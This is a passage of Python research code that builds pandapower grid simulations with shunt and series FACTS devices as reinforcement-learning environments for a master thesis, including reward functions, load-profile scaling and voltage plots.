sw_SVC = pp.create_switch(self.net, bus=1, element=0, et='t', type='CB', closed=False)
# Shunt device connected with MV bus
shuntDev = pp.create_shunt(self.net, bus_SVC, 0, in_service=True, name='Shunt Device', step=1)
##Series device (at line 3, in middle between bus 2 and 3)
# Add intermediate buses for bypass and series compensation impedance
bus_SC1 = pp.create_bus(self.net, name='SC bus 1', vn_kv=230, type='n', geodata=(-1, 3.1), zone=2,
max_vm_pu=1.1, min_vm_pu=0.9)
bus_SC2 = pp.create_bus(self.net, name='SC bus 2', vn_kv=230, type='n', geodata=(-1, 3.0), zone=2,
max_vm_pu=1.1, min_vm_pu=0.9)
sw_SC_bypass = pp.create_switch(self.net, bus=5, element=6, et='b', type='CB', closed=True)
imp_SC = pp.create_impedance(self.net, from_bus=5, to_bus=6, rft_pu=0.01272, xft_pu=-0.0636,
rtf_pu=0.01272, xtf_pu=-0.0636, sn_mva=250, in_service=True)
# Adjust orginal Line 3 to connect to new buses instead.
self.net.line.at[3, ['length_km', 'to_bus', 'name']] = [0.5, 5, 'line1_SC']
lineSC2 = pp.create_line_from_parameters(self.net, name='line2_SC',
c_nf_per_km=self.net.line.at[3, 'c_nf_per_km'],
df=self.net.line.at[3, 'df'], from_bus=6,
g_us_per_km=self.net.line.at[3, 'g_us_per_km'],
in_service=self.net.line.at[3, 'in_service'], length_km=0.5,
max_i_ka=self.net.line.at[3, 'max_i_ka'],
max_loading_percent=self.net.line.at[3, 'max_loading_percent'],
parallel=self.net.line.at[3, 'parallel'],
r_ohm_per_km=self.net.line.at[3, 'r_ohm_per_km'],
std_type=self.net.line.at[3, 'std_type'], to_bus=3,
type=self.net.line.at[3, 'type'],
x_ohm_per_km=self.net.line.at[3, 'x_ohm_per_km']);
# Change PV generator to static generator
self.net.gen.drop(index=[0], inplace=True) # Drop PV generator
pp.create_sgen(self.net, 3, p_mw=318, q_mvar=181.4, name='static generator', scaling=1)
# Randomize starting index in load/gen profiles
self.numberOfTimeStepsPerState=numberOfTimeStepsPerState;
self.stateIndex = np.random.randint(len(self.loadProfile)-self.numberOfTimeStepsPerState, size=1)[0];
#self.stateIndex=0
self.scaleLoadAndPowerValue(self.stateIndex);
try:
pp.runpp(self.net, run_control=False)
print('Environment has been successfully initialized');
except:
print('Some error occured while creating environment');
raise Exception('cannot proceed at these settings. Please fix the environment settings');
# Power flow calculation, runControl = True gives shunt device trafo tap changer iterative control activated
def runEnv(self, runControl):
try:
pp.runpp(self.net, run_control=runControl);
#print('Environment has been successfully initialized');
except:
print('Some error occurred while creating environment');
raise Exception('cannot proceed at these settings. Please fix the environment settings');
## Retreieve voltage and line loading percent as measurements of current state
def getCurrentState(self):
bus_index_shunt = 1
line_index = 1;
return (self.net.res_bus.vm_pu[bus_index_shunt], self.net.res_line.loading_percent[line_index]);
## Retrieve measurements for multiple buses, including load angle for DQN as well
def getCurrentStateForDQN(self):
return [self.net.res_bus.vm_pu[1:-3], self.net.res_line.loading_percent[0:], self.net.res_bus.va_degree[1:-3]];
## UPDATE NEEED:
def takeAction(self, lp_ref, v_ref_pu):
#q_old = 0
bus_index_shunt = 1
line_index=3;
impedenceBackup = self.net.impedance.loc[0, 'xtf_pu'];
shuntBackup = self.net.shunt.q_mvar
self.net.switch.at[1, 'closed'] = False
self.net.switch.at[0, 'closed'] = True
##shunt compenstation
q_comp = self.Shunt_q_comp(v_ref_pu, bus_index_shunt, self.q_old);
self.q_old = q_comp;
self.net.shunt.q_mvar = q_comp;
##series compensation
k_x_comp_pu = self.K_x_comp_pu(lp_ref, 1, self.k_old);
self.k_old = k_x_comp_pu;
x_line_pu = self.X_pu(line_index)
self.net.impedance.loc[0, ['xft_pu', 'xtf_pu']] = x_line_pu * k_x_comp_pu
networkFailure = False
self.stateIndex += 1;
if self.stateIndex < len(self.powerProfile):
self.scaleLoadAndPowerValue(self.stateIndex);
try:
pp.runpp(self.net, run_control=True);
reward = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent);
except:
print('Unstable environment settings');
networkFailure = True;
reward = -1000;
return (self.net.res_bus.vm_pu[bus_index_shunt], self.net.res_line.loading_percent[line_index]), reward, self.stateIndex == len(self.powerProfile) or networkFailure;
##Function to calculate line reactance in pu
def X_pu(self, line_index):
s_base = 100e6
v_base = 230e3
x_base = pow(v_base, 2) / s_base
x_line_ohm = self.net.line.x_ohm_per_km[line_index]
x_line_pu = x_line_ohm / x_base # Can take one since this line is divivded into
# 2 identical lines with length 0.5 km
return x_line_pu
def reset(self):
print('reset the current environment for next episode');
oldIndex = self.stateIndex;
self.stateIndex = np.random.randint(len(self.loadProfile)-1, size=1)[0];
self.net.switch.at[0, 'closed'] = False
self.net.switch.at[1, 'closed'] = True
self.k_old = 0;
self.q_old = 0;
self.scaleLoadAndPowerValue(self.stateIndex);
try:
pp.runpp(self.net, run_control=False);
print('Environment has been successfully initialized');
except:
print('Some error occurred while resetting the environment');
raise Exception('cannot proceed at these settings. Please fix the environment settings');
# Calculate immediate reward with loadangle as optional
def calculateReward(self, voltages, loadingPercent, loadAngles=10):
try:
rew = 0;
for i in range(1, len(voltages)-2): # Dont need to include bus 0 as it is the slack with constant voltage and angle
# -2 because dont want to inclue buses created for FACTS device implementation (3 of them)
if voltages[i] > 1.25 or voltages[i] < 0.8:
rew -= 50;
elif voltages[i] > 1.1 or voltages[i] < 0.9:
rew -= 25;
elif voltages[i] > 1.05 or voltages[i] < 0.95:
rew -= 10;
elif voltages[i] > 1.025 or voltages[i] < 0.975:
rew += 10;
else:
rew += 20;
rew = rew
loadingPercentInstability = np.std(loadingPercent) * len(loadingPercent);
rew -= loadingPercentInstability
# Check load angle
for i in range(1, len(loadAngles)-2):
if abs(loadAngles[i]) >= 30:
rew -= 200
except:
print('exception in calculate reward')
print(voltages);
print(loadingPercent)
return 0;
return rew
## Simple plot of one-line diagram
def plotGridFlow(self):
print('plotting powerflow for the current state')
plot.simple_plot(self.net)
## Scale load and generation from load and generation profiles
## Update Needed (Nominal Values)
def scaleLoadAndPowerValue(self,index):
scalingFactorLoad = self.loadProfile[index] / (sum(self.loadProfile)/len(self.loadProfile));
scalingFactorPower = self.powerProfile[index] / max(self.powerProfile);
# Scaling all loads and the static generator
self.net.load.p_mw = self.net.load.p_mw * scalingFactorLoad;
self.net.load.q_mvar = self.net.load.q_mvar * scalingFactorLoad;
self.net.sgen.p_mw = self.net.sgen.p_mw * scalingFactorPower;
self.net.sgen.q_mvar = self.net.sgen.q_mvar * scalingFactorPower;
## UPDATE NEEDED:
##Function for transition from reference power to reactance of series device
def K_x_comp_pu(self, loading_perc_ref, line_index, k_old):
##NEW VERSION TEST:
c = 15 # Coefficient for transition
k_x_comp_max_ind = 0.4
k_x_comp_max_cap = -k_x_comp_max_ind
loading_perc_meas = self.net.res_line.loading_percent[line_index]
k_delta = (c * k_x_comp_max_ind * (
loading_perc_meas - loading_perc_ref) / 100) - k_old # 100 To get percentage in pu
k_x_comp = k_delta + k_old
# Bypassing series device if impedance close to 0
if abs(k_x_comp) < 0.0001: # Helping with convergence
self.net.switch.closed[1] = True # ACTUAL network, not a copy
# Make sure output within rating of device
if k_x_comp > k_x_comp_max_ind:
k_x_comp = k_x_comp_max_ind
if k_x_comp < k_x_comp_max_cap:
k_x_comp = k_x_comp_max_cap
return k_x_comp
## UPDATE NEEDED:
## Function for transition from reference parameter to reactive power output of shunt device
def Shunt_q_comp(self, v_ref_pu, bus_index, q_old):
v_bus_pu = self.net.res_bus.vm_pu[bus_index]
k = 25 # Coefficient for transition, tuned to hit 1 pu with nominal IEEE
q_rated = 100 # Mvar
q_min = -q_rated
q_max = q_rated
q_delta = k * q_rated * (
v_bus_pu - v_ref_pu) - q_old # q_old might come in handy later with RL if able to take actions without
# independent change in environment
q_comp = q_delta + q_old
if q_comp > q_max:
q_comp = q_max
if q_comp < q_min:
q_comp = q_min
# print(q_comp)
return q_comp
#The class for the 2-bus test network used in the Master Thesis by Joakim Oldeen & Vishnu Sharma.
#The class also include several methods used by different RL algorithms such as taking action, calculating reward, recieving states and more
class powerGrid_ieee2:
def __init__(self,method):
#print('in init. Here we lay down the grid structure and load some random state values based on IEEE dataset');
self.method=method;
if self.method in ('dqn','ddqn','td3'):
self.errorState=[-2, -1000, -90];
self.numberOfTimeStepsPerState=3
else:
self.errorState=[-2,-1000];
self.numberOfTimeStepsPerState=1
with open('Data/JanLoadEvery5mins.pkl', 'rb') as pickle_file:
self.loadProfile = pickle.load(pickle_file)
with open('Data/generatorValuesEvery5mins.pkl', 'rb') as pickle_file:
self.powerProfile = pickle.load(pickle_file)
with open('Data/trainIndices.pkl', 'rb') as pickle_file:
self.trainIndices = pickle.load(pickle_file)
with open('Data/testIndices.pkl', 'rb') as pickle_file:
self.testIndices = pickle.load(pickle_file)
self.testIndices = [860,860,860]
self.actionSpace = {'v_ref_pu': [i*5 / 100 for i in range(18, 23)], 'lp_ref': [i * 15 for i in range(0, 11)]}
#self.deepActionSpace = {'v_ref_pu': [i/ 100 for i in range(90, 111)], 'lp_ref': [i * 5 for i in range(0, 31)]}
self.deepActionSpace = {'v_ref_pu': [i*2/100 for i in range(45, 56)], 'lp_ref': [i * 10 for i in range(0, 16)]}
self.k_old = 0;
self.q_old = 0;
## Basic ieee 4bus system to copy parts from
net_temp = pp.networks.case4gs();
# COPY PARAMETERS FROM TEMP NETWORK TO USE IN 2 BUS RADIAL SYSTEM.
# BUSES
b0_in_service = net_temp.bus.in_service[0]
b0_max_vm_pu = net_temp.bus.max_vm_pu[0]
b0_min_vm_pu = net_temp.bus.min_vm_pu[0]
b0_name = net_temp.bus.name[0]
b0_type = net_temp.bus.type[0]
b0_vn_kv = net_temp.bus.vn_kv[0]
b0_zone = net_temp.bus.zone[0]
b0_geodata = (3, 2)
b1_in_service = net_temp.bus.in_service[1]
b1_max_vm_pu = net_temp.bus.max_vm_pu[1]
b1_min_vm_pu = net_temp.bus.min_vm_pu[1]
b1_name = net_temp.bus.name[1]
b1_type = net_temp.bus.type[1]
b1_vn_kv = net_temp.bus.vn_kv[1]
b1_zone = net_temp.bus.zone[1]
b1_geodata = (4, 2)
# BUS ELEMENTS
load_bus = net_temp.load.bus[1]
load_in_service = net_temp.load.in_service[1]
load_p_mw = net_temp.load.p_mw[1]
load_q_mvar = net_temp.load.q_mvar[1]
load_scaling = net_temp.load.scaling[1]
extGrid_bus = net_temp.ext_grid.bus[0]
extGrid_in_service = net_temp.ext_grid.in_service[0]
extGrid_va_degree = net_temp.ext_grid.va_degree[0]
extGrid_vm_pu = net_temp.ext_grid.vm_pu[0]
extGrid_max_p_mw = net_temp.ext_grid.max_p_mw[0]
extGrid_min_p_mw = net_temp.ext_grid.min_p_mw[0]
extGrid_max_q_mvar = net_temp.ext_grid.max_q_mvar[0]
extGrid_min_q_mvar = net_temp.ext_grid.min_q_mvar[0]
# LINES
line0_scaling = 1
line0_c_nf_per_km = net_temp.line.c_nf_per_km[0]
line0_df = net_temp.line.df[0]
line0_from_bus = net_temp.line.from_bus[0]
line0_g_us_per_km = net_temp.line.g_us_per_km[0]
line0_in_service = net_temp.line.in_service[0]
line0_length_km = net_temp.line.length_km[0]
line0_max_i_ka = net_temp.line.max_i_ka[0]
line0_max_loading_percent = net_temp.line.max_loading_percent[0]
line0_parallel = net_temp.line.parallel[0]
line0_r_ohm_per_km = net_temp.line.r_ohm_per_km[0] * line0_scaling
line0_to_bus = net_temp.line.to_bus[0]
line0_type = net_temp.line.type[0]
line0_x_ohm_per_km = net_temp.line.x_ohm_per_km[0] * line0_scaling
line1_scaling = 1.2
line1_c_nf_per_km = line0_c_nf_per_km
line1_df = line0_df
line1_from_bus = line0_from_bus
line1_g_us_per_km = line0_g_us_per_km
line1_in_service = line0_in_service
line1_length_km = line0_length_km
line1_max_i_ka = line0_max_i_ka
line1_max_loading_percent = line0_max_loading_percent
line1_parallel = line0_parallel
line1_r_ohm_per_km = line0_r_ohm_per_km
line1_to_bus = line0_to_bus
line1_type = line0_type
line1_x_ohm_per_km = line0_x_ohm_per_km * line1_scaling # Assume that the lines are identical except for line reactance
## creating 2 bus system using nominal values from 4 bus system
self.net = pp.create_empty_network()
# Create buses
b0 = pp.create_bus(self.net, in_service=b0_in_service, max_vm_pu=b0_max_vm_pu, min_vm_pu=b0_min_vm_pu,
name=b0_name, type=b0_type, vn_kv=b0_vn_kv, zone=b0_zone, geodata=b0_geodata)
b1 = pp.create_bus(self.net, in_service=b1_in_service, max_vm_pu=b1_max_vm_pu, min_vm_pu=b1_min_vm_pu,
name=b1_name, type=b1_type, vn_kv=b1_vn_kv, zone=b1_zone, geodata=b1_geodata)
# Create bus elements
load = pp.create_load(self.net, bus=load_bus, in_service=load_in_service,
p_mw=load_p_mw, q_mvar=load_q_mvar, scaling=load_scaling)
extGrid = pp.create_ext_grid(self.net, bus=extGrid_bus, in_service=extGrid_in_service,
va_degree=extGrid_va_degree,
vm_pu=extGrid_vm_pu, max_p_mw=extGrid_max_p_mw, min_p_mw=extGrid_min_p_mw,
max_q_mvar=extGrid_max_q_mvar, min_q_mvar=extGrid_min_q_mvar)
# Create lines
l0 = pp.create_line_from_parameters(self.net, c_nf_per_km=line0_c_nf_per_km, df=line0_df, from_bus=line0_from_bus,
g_us_per_km=line0_g_us_per_km, in_service=line0_in_service,
length_km=line0_length_km,
max_i_ka=line0_max_i_ka, max_loading_percent=line0_max_loading_percent,
parallel=line0_parallel, r_ohm_per_km=line0_r_ohm_per_km,
to_bus=line0_to_bus,
type=line0_type, x_ohm_per_km=line0_x_ohm_per_km)
l1 = pp.create_line_from_parameters(self.net, c_nf_per_km=line1_c_nf_per_km, df=line1_df, from_bus=line1_from_bus,
g_us_per_km=line1_g_us_per_km, in_service=line1_in_service,
length_km=line1_length_km,
max_i_ka=line1_max_i_ka, max_loading_percent=line1_max_loading_percent,
parallel=line1_parallel, r_ohm_per_km=line1_r_ohm_per_km,
to_bus=line1_to_bus,
type=line1_type, x_ohm_per_km=line1_x_ohm_per_km)
####Shunt FACTS device (bus 1)
# MV bus
bus_SVC = pp.create_bus(self.net, name='MV SVCtrafo bus', vn_kv=69, type='n', geodata=(4.04, 1.98), zone=2,
max_vm_pu=1.1,
min_vm_pu=0.9)
# Trafo
trafoSVC = pp.create_transformer_from_parameters(self.net, hv_bus=1, lv_bus=2, in_service=True,
name='trafoSVC', sn_mva=110, vn_hv_kv=230, vn_lv_kv=69,
vk_percent=12, vkr_percent=0.26, pfe_kw=55, i0_percent=0.06,
shift_degree=0, tap_side='hv', tap_neutral=0, tap_min=-9,
tap_max=9,
tap_step_percent=1.5, tap_step_degree=0,
tap_phase_shifter=False)
# TAP Changer on shunt device usually not used in Real life implementation.
#trafo_control = ct.DiscreteTapControl(net=self.net, tid=0, vm_lower_pu=0.95, vm_upper_pu=1.05)
# Breaker between grid HV bus and trafo HV bus to connect buses
sw_SVC = pp.create_switch(self.net, bus=1, element=0, et='t', type='CB', closed=False)
# Shunt devices connected with MV bus
shuntDev = pp.create_shunt(self.net, bus_SVC, 2, in_service=True, name='Shunt Device', step=1)
####Series device (at line 1, in middle between bus 0 and 1)
# Add intermediate buses for bypass and series compensation impedance
bus_SC1 = pp.create_bus(self.net, name='SC bus 1', vn_kv=230, type='n', geodata=(3.48, 2.05),
zone=2, max_vm_pu=1.1, min_vm_pu=0.9)
bus_SC2 = pp.create_bus(self.net, name='SC bus 2', vn_kv=230, type='n', geodata=(3.52, 2.05),
zone=2, max_vm_pu=1.1, min_vm_pu=0.9)
sw_SC_bypass = pp.create_switch(self.net, bus=3, element=4, et='b', type='CB', closed=True)
imp_SC = pp.create_impedance(self.net, from_bus=3, to_bus=4, rft_pu=0.0000001272, xft_pu=-0.0636*0.4,
rtf_pu=0.0000001272, xtf_pu=-0.0636*0.4, sn_mva=250,
in_service=True) # Just some default values
# Adjust orginal Line 3 to connect to new buses instead.
self.net.line.at[1, ['length_km', 'to_bus', 'name']] = [0.5, 3, 'line1_SC']
self.nominalP=self.net.load.p_mw[0]
self.nominalQ=self.net.load.q_mvar[0]
## select a random state for the episode
#self.stateIndex = np.random.randint(len(self.loadProfile)-1-self.numberOfTimeStepsPerState, size=1)[0];
def setMode(self,mode):
if mode=='train':
self.source=self.trainIndices;
else:
self.source=self.testIndices;
self.stateIndex = self.getstartingIndex()
self.scaleLoadAndPowerValue(self.stateIndex);
try:
pp.runpp(self.net, run_control=False);
print('Environment has been successfully initialized');
# Create SHUNT controllers
self.shuntControl = ShuntFACTS(net=self.net, busVoltageInd=1, convLim=0.0005)
self.seriesControl = SeriesFACTS(net=self.net, lineLPInd=1, convLim=0.0005, x_line_pu=self.X_pu(1))
except:
print('Some error occurred while creating environment');
raise Exception('cannot proceed at these settings. Please fix the environment settings');
def getstartingIndex(self):
index = np.random.randint(len(self.source), size=1)[0];
if self.source[index] + self.numberOfTimeStepsPerState < len(self.loadProfile):
return self.source[index];
else:
return self.getstartingIndex()
# Power flow calculation, runControl = True gives shunt device trafo tap changer iterative control activated
def runEnv(self, runControl):
try:
pp.runpp(self.net, run_control=runControl);
#print('Environment has been successfully initialized');
except:
#print(self.net.load.p_mw[0],self.net.load.q_mvar[0]);
#print(self.stateIndex)
#print(len(self.powerProfile))
if runControl:
print('Some error occurred while running environment after load increment in runEnv Function in DQN');
else:
print('Some error occurred while running environment after reset in runEnv Function in DQN');
raise Exception('cannot proceed at these settings. Please fix the environment settings');
## Retreieve voltage and line loading percent as measurements of current state
def getCurrentState(self):
bus_index_shunt = 1
line_index = 1;
return [self.net.res_bus.vm_pu[bus_index_shunt], self.net.res_line.loading_percent[line_index]];
def getCurrentStateForDQN(self):
bus_index_shunt = 1
line_index = 1;
return [self.net.res_bus.vm_pu[bus_index_shunt], self.net.res_line.loading_percent[line_index]/150, self.net.res_bus.va_degree[bus_index_shunt]/30];
# Return mean line loading in system. Emulation of what system operator would have set loading reference to.
def lp_ref_operator(self):
return stat.mean(self.net.res_line.loading_percent)
## Take epsilon-greedy action
## Return next state measurements, reward, done (boolean)
def takeAction(self, lp_ref, v_ref_pu):
# print('taking action')
stateAfterAction = copy.deepcopy(self.errorState);
stateAfterEnvChange = copy.deepcopy(self.errorState);
measAfterAction = [-2, -1000, -1000]
self.net.switch.at[0, 'closed'] = True
self.net.switch.at[1, 'closed'] = False
if lp_ref != 'na' and v_ref_pu != 'na':
self.shuntControl.ref = v_ref_pu;
self.seriesControl.ref = lp_ref;
networkFailure = False
done = False;
bus_index_shunt = 1;
line_index = 1;
if self.stateIndex < min(len(self.powerProfile), len(self.loadProfile)):
try:
dummyRes = (self.net.res_bus.vm_pu, self.net.res_line.loading_percent)
## state = (voltage,ll,angle,p,q)
pp.runpp(self.net, run_control=True);
if self.method in ('dqn', 'ddqn','td3'):
reward1 = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent,
self.net.res_bus.va_degree[bus_index_shunt]);
stateAfterAction = self.getCurrentStateForDQN()
else:
reward1 = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent);
stateAfterAction = self.getCurrentState()
#print('rew1: ', reward1)
measAfterAction = [self.net.res_bus.vm_pu[1], max(self.net.res_line.loading_percent), np.std(self.net.res_line.loading_percent)]
done = self.stateIndex == (len(self.powerProfile) - 1)
if done == False:
self.incrementLoadProfile()
if self.method in ('dqn', 'ddqn','td3'):
reward2 = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent,
self.net.res_bus.va_degree[bus_index_shunt]);
stateAfterEnvChange = self.getCurrentStateForDQN()
else:
reward2 = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent);
stateAfterEnvChange = self.getCurrentState()
#print('rew2: ',reward2)
reward = 0.7 * reward1 + 0.3 * reward2;
except:
print('Unstable environment settings in takeAction(). Action: ', (lp_ref, v_ref_pu), 'p_mw: ', self.net.load.p_mw[0]);
print('shunt, series, series switch: ', self.net.shunt.q_mvar[0], self.net.impedance.loc[0, ['xft_pu']], self.net.switch.closed[1])
#print(stateAfterEnvChange)
#print(stateAfterAction)
#print(lp_ref,v_ref_pu)
# print(dummyRes)
#print(self.net.load.p_mw[0],self.net.load.q_mvar[0]);
networkFailure = True;
reward = 0;
# return stateAfterAction, reward, networkFailure,stateAfterEnvChange ;
else:
print('wrong block!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
stateAfterEnvChange.extend(stateAfterAction)
# print(self.errorState)
# print(reward2)
#print('totrew: ', reward)
return stateAfterEnvChange, reward, done or networkFailure, measAfterAction;
## Same as Take Action but without Try for debugging
def takeAction_noTry(self, lp_ref, v_ref_pu):
# print('taking action')
stateAfterAction = copy.deepcopy(self.errorState);
stateAfterEnvChange = copy.deepcopy(self.errorState);
measAfterAction = [-2, -1000, -1000]
self.net.switch.at[0, 'closed'] = True
self.net.switch.at[1, 'closed'] = False
if lp_ref != 'na' and v_ref_pu != 'na':
self.shuntControl.ref = v_ref_pu;
self.seriesControl.ref = lp_ref;
networkFailure = False
done = False;
bus_index_shunt = 1;
line_index = 1;
if self.stateIndex < min(len(self.powerProfile), len(self.loadProfile)):
dummyRes = (self.net.res_bus.vm_pu, self.net.res_line.loading_percent)
## state = (voltage,ll,angle,p,q)
pp.runpp(self.net, run_control=True);
if self.method in ('dqn', 'ddqn', 'td3'):
reward1 = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent,
self.net.res_bus.va_degree[bus_index_shunt]);
stateAfterAction = self.getCurrentStateForDQN()
else:
reward1 = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent);
stateAfterAction = self.getCurrentState()
# print('rew1: ', reward1)
measAfterAction = [self.net.res_bus.vm_pu[1], max(self.net.res_line.loading_percent),
np.std(self.net.res_line.loading_percent)]
done = self.stateIndex == (len(self.powerProfile) - 1)
if done == False:
self.incrementLoadProfile()
if self.method in ('dqn', 'ddqn', 'td3'):
reward2 = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent,
self.net.res_bus.va_degree[bus_index_shunt]);
stateAfterEnvChange = self.getCurrentStateForDQN()
else:
reward2 = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent);
stateAfterEnvChange = self.getCurrentState()
# print('rew2: ',reward2)
reward = 0.7 * reward1 + 0.3 * reward2;
else:
print('wrong block!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
stateAfterEnvChange.extend(stateAfterAction)
# print(self.errorState)
# print(reward2)
# print('totrew: ', reward)
return stateAfterEnvChange, reward, done or networkFailure, measAfterAction;
def incrementLoadProfile(self):
self.stateIndex += 1;
self.scaleLoadAndPowerValue(self.stateIndex);
self.runEnv(True);
"""
try:
pp.runpp(self.net);
reward = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent);
except:
networkFailure=True;
self.net.shunt.q_mvar=shuntBackup;
self.net.impedance.loc[0, ['xft_pu', 'xtf_pu']]=impedenceBackup;
pp.runpp(self.net);
reward=1000;
return self.net.res_bus,reward,True;
self.stateIndex += 1;
if self.stateIndex < len(self.powerProfile):
if (self.scaleLoadAndPowerValue(self.stateIndex, self.stateIndex - 1) == False):
networkFailure = True;
reward = 1000;
# self.stateIndex -= 1;
return self.net.res_bus, reward, self.stateIndex == len(self.powerProfile) or networkFailure;
"""
##Function to calculate line reactance in pu
def X_pu(self, line_index):
s_base = 100e6
v_base = 230e3
x_base = pow(v_base, 2) / s_base
x_line_ohm = self.net.line.x_ohm_per_km[line_index]
x_line_pu = x_line_ohm / x_base # Can take one since this line is divivded into
# 2 identical lines with length 0.5 km
#print(x_line_pu)
return x_line_pu
## Resets environment choosing new starting state, used for beginning of each episode
def reset(self):
self.stateIndex = self.getstartingIndex()
#Disable FACTS
self.net.switch.at[0, 'closed'] = False
self.net.switch.at[1, 'closed'] = True
# Make sure FACTS output is reset for controllers to work properly
#print(self.net.shunt.q_mvar[0])
#self.net.shunt.q_mvar[0] = 0
#print(self.net.impedance.loc[0, ['xft_pu']])
#self.net.impedance.loc[0, ['xft_pu', 'xtf_pu']] =
#self.net.shunt.q_mvar
self.scaleLoadAndPowerValue(self.stateIndex);
try:
pp.runpp(self.net, run_control=False);
except:
print('Some error occurred while resetting the environment');
raise Exception('cannot proceed at these settings. Please fix the environment settings');
## Calculate immediate reward
def calculateReward(self, voltages, loadingPercent,loadAngle=10):
try:
rew=0;
for i in range(1,2):
if voltages[i] > 1:
rew=voltages[i]-1;
else:
rew=1-voltages[i];
rewtemp = rew # For storage to set reward to 0
rew = math.exp(rew*10)*-20;
#print(rew)
loadingPercentInstability=np.std(loadingPercent)# Think it works better without this addition: * len(loadingPercent);
rew = rew - loadingPercentInstability;
# (math.exp(abs(1-voltages[i])*10)*-20)-std ;
#print(rew)
#rew=rew if abs(loadAngle)<30 else rew-200;
except:
print('exception in calculate reward')
print(voltages);
print(loadingPercent)
return 0;
rew = (200+rew)/200 # normalise between 0-1
if rewtemp > 0.15 or abs(loadAngle)>=30: # IF voltage deviating more than 0.15 pu action is very very bad.
rew = 0.001 #Also makes sure that final rew >=0
if rew < 0:
rew = 0
return rew
## Simple plot diagram
def plotGridFlow(self):
print('plotting powerflow for the current state')
plot.simple_plot(self.net)
## Scale load and generation from load and generation profiles
def scaleLoadAndPowerValue(self,index):
scalingFactorLoad = self.loadProfile[index] / (sum(self.loadProfile)/len(self.loadProfile));
scalingFactorPower = self.powerProfile[index] / max(self.powerProfile);
self.net.load.p_mw[0] = self.nominalP * scalingFactorLoad;
self.net.load.q_mvar[0] = self.nominalQ * scalingFactorLoad;
#self.net.sgen.p_mw = self.net.sgen.p_mw * scalingFactorPower;
#self.net.sgen.q_mvar = self.net.sgen.q_mvar * scalingFactorPower;
def runNoFACTS(self, busVoltageInd):
# Bypass FACTS devices if wantd
self.net.switch.at[0, 'closed'] = True
self.net.switch.at[1, 'closed'] = False
self.net.controller.in_service[0] = True
self.net.controller.in_service[1] = True
self.shuntControl.ref = 1
self.seriesControl.ref = 50
# Create array
v_arr = []
l_arr = []
# Loop through all loadings
for i in range(0, 600): #len(self.loadProfile)
# Increment and run environment
self.stateIndex += 1;
self.scaleLoadAndPowerValue(self.stateIndex);
self.runEnv(True);
# Store result for current settings
v_arr.append(self.net.res_bus.vm_pu[busVoltageInd])
l_arr.append(self.stateIndex)
# Plot result
print(max(v_arr))
print(min(v_arr))
plt.plot(l_arr, v_arr)
plt.grid()
plt.xlabel('Time step on load profile [-]', fontsize= 18 )
plt.ylabel('Voltage [pu]', fontsize= 18)
plt.title('Bus 2 Voltage with shunt+series FACTS ', fontsize= 22)
plt.show()
def runNoRL(self, busVoltageInd):
# Print the load profile:
# loadProfilesScaled = self.loadProfile / (sum(self.loadProfile) / len(self.loadProfile))
# P = loadProfilesScaled * self.nominalP
# Q = loadProfilesScaled * self.nominalQ
# xaxis = range(0, len(self.loadProfile))
# fig, ax1 = plt.subplots()
# ax1.set_title('Load profile', fontsize=24)
# ax1.set_xlabel('Time step on load profile [-]', fontsize=20)
# ax1.set_ylabel('Active power [MW] ', color='r', fontsize=20)
# ax1.plot(xaxis, P, color='r')
# ax1.set_ylim(0, 500)
# plt.xticks(fontsize=16)
# plt.yticks(fontsize=16)
# ax2 = ax1.twinx()
# ax2.set_ylabel('Reactive power [Mvar] ', color='tab:blue', fontsize=20)
# ax2.plot(xaxis, Q, color='tab:blue')
# ax2.set_ylim(0,500)
# plt.xticks(fontsize=16)
# plt.yticks(fontsize=16)
# plt.grid()
# plt.show()
#
# #Zoomed in version:
# fig, ax1 = plt.subplots()
# ending = 1000-1
# ax1.set_title('Load profile', fontsize=24)
# ax1.set_xlabel('Time step on load profile [-]', fontsize=20)
# ax1.set_ylabel('Active power [MW] ', color='r', fontsize=20)
# ax1.plot(xaxis[0:ending], P[0:ending], color='r')
# ax1.set_ylim(0,500)
# plt.xticks(fontsize=16)
# plt.yticks(fontsize=16)
# ax2 = ax1.twinx()
# ax2.set_ylabel('Reactive power [Mvar] ', color='tab:blue', fontsize=20)
# ax2.plot(xaxis[0:ending], Q[0:ending], color='tab:blue')
# ax2.set_ylim(0,500)
# plt.xticks(fontsize=16)
# plt.yticks(fontsize=16)
# plt.grid()
# plt.show()
#SHUNT+SERIES:
# Bypass FACTS devices if wantd
self.net.switch.at[0, 'closed'] = True
self.net.switch.at[1, 'closed'] = True
self.net.controller.in_service[0] = True
self.net.controller.in_service[1] = False
self.shuntControl.ref = 1
self.seriesControl.ref = 50
# Create array
v_arr = []
v_arr_so = []
l_arr = []
# Loop through all loadings
for i in range(0, 600): # len(self.loadProfile)
# Increment and run environment
self.stateIndex += 1;
self.scaleLoadAndPowerValue(self.stateIndex);
self.runEnv(True);
# Store result for current settings
v_arr_so.append(self.net.res_bus.vm_pu[busVoltageInd])
l_arr.append(self.stateIndex)
#SHUNT ONLY
self.setMode('test')
self.net.switch.at[0, 'closed'] = True
self.net.switch.at[1, 'closed'] = False
self.net.controller.in_service[0] = True
self.net.controller.in_service[1] = True
for i in range(0, 600): # len(self.loadProfile)
# Increment and run environment
self.stateIndex += 1;
self.scaleLoadAndPowerValue(self.stateIndex);
self.runEnv(True);
# Store result for current settings
v_arr.append(self.net.res_bus.vm_pu[busVoltageInd])
# Plot result
print(max(v_arr))
print(min(v_arr))
print(max(v_arr_so))
print(min(v_arr_so))
plt.plot(l_arr, v_arr)
plt.plot(l_arr, v_arr_so)
plt.grid()
plt.xlabel('Time step on load profile [-]', fontsize=20)
plt.ylabel('Voltage [pu]', fontsize=20)
plt.title('Bus 2 Voltage with non-RL FACTS ', fontsize=24)
plt.legend(['shunt+series','shunt only'], fontsize=12)
plt.xticks(fontsize=16)
plt.yticks(fontsize=16)
plt.show()
##Load Profile data has been pickled already, do not run this function for now
def createLoadProfile():
